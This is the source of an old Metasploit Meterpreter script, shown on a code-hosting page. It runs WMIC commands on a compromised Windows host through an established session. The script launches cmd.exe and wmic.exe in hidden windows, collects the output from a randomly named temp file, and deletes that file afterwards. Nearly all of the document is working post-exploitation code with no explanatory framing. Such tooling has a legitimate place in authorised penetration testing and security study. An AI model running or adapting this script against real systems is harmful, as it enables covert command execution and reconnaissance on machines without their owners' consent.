Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
9
# and Windows XP and Windows 2008 targets.
10
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
11
################## Variable Declarations ##################
12
session = client
13
wininfo = client.sys.config.sysinfo
14
# Setting Arguments
15
@@exec_opts = Rex::Parser::Arguments.new(
16
  "-h" => [ false,"Help menu."                        ],
17
  "-c" => [ true,"Command to execute. The command must be enclosed in double quotes."],
18
  "-f" => [ true,"File where to saved output of command."],
19
  "-s" => [ true,"Text file with list of commands, one per line."]
20
)
21
#Setting Argument variables
22
commands = []
23
script = []
24
outfile = nil
25

26
################## Function Declarations ##################
27
# Function for running a list of WMIC commands stored in a array, returns string
28
def wmicexec(session,wmiccmds= nil)
29
  tmpout = ''
30
  session.response_timeout=120
31
  begin
32
    tmp = session.sys.config.getenv('TEMP')
33
    wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
34
    wmiccmds.each do |wmi|
35
      print_status "running command wmic #{wmi}"
36
      print_line wmicfl
37
      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
38
      sleep(2)
39
      #Making sure that wmic finishes before executing next wmic command
40
      prog2check = "wmic.exe"
41
      found = 0
42
      while found == 0
43
        session.sys.process.get_processes().each do |x|
44
          found =1
45
          if prog2check == (x['name'].downcase)
46
            sleep(0.5)
47
            found = 0
48
          end
49
        end
50
      end
51
      r.close
52
    end
53
    # Read the output file of the wmic commands
54
    wmioutfile = session.fs.file.new(wmicfl, "rb")
55
    until wmioutfile.eof?
56
      tmpout << wmioutfile.read
57
    end
58
    wmioutfile.close
59
  rescue ::Exception => e
60
    print_status("Error running WMIC commands: #{e.class} #{e}")
61
  end
62
  # We delete the file with the wmic command output.
63
  c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
64
  c.close
65
  tmpout
66
end
67
# Function for writing results of other functions to a file
68
def filewrt(file2wrt, data2wrt)
69
  output = ::File.open(file2wrt, "a")
70
  data2wrt.each_line do |d|
71
    output.puts(d)
72
  end
73
  output.close
74
end
75

76
#check for proper Meterpreter Platform
77
def unsupported
78
  print_error("This version of Meterpreter is not supported with this Script!")
79
  raise Rex::Script::Completed
80
end
81

82

83
def usage
84
  print_line("Windows WMIC Command Execution Meterpreter Script ")
85
  print_line @@exec_opts.usage
86
  print_line("USAGE:")
87
  print_line("run wmic -c \"WMIC Command Argument\"\n")
88
  print_line("NOTE:")
89
  print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
90
  print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
91
  print_line("Example:")
92
  print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
93
  raise Rex::Script::Completed
94
end
95

96
################## Main ##################
97
@@exec_opts.parse(args) { |opt, idx, val|
98
  case opt
99
  when "-c"
100

101
    commands.concat(val.split("/"))
102

103
  when "-s"
104

105
    script = val
106
    if not ::File.exist?(script)
107
      raise "Command List File does not exist!"
108
    else
109
      ::File.open(script, "r").each_line do |line|
110
        next if line.strip.length < 1
111
        next if line[0,1] == "#"
112
        commands << line.chomp
113
      end
114
    end
115
  when "-f"
116

117
    outfile = val
118
  when "-h"
119
    usage
120
  else
121
    print_error "Unknown option: #{opt}"
122
    usage
123
  end
124

125
}
126

127
if args.length == 0
128
  usage
129
end
130
unsupported if client.platform != 'windows'
131

132
if outfile == nil
133
  print_status wmicexec(session,commands)
134
else
135
  print_status("Saving output of WMIC to #{outfile}")
136
  filewrt(outfile, wmicexec(session,commands))
137
end
138

139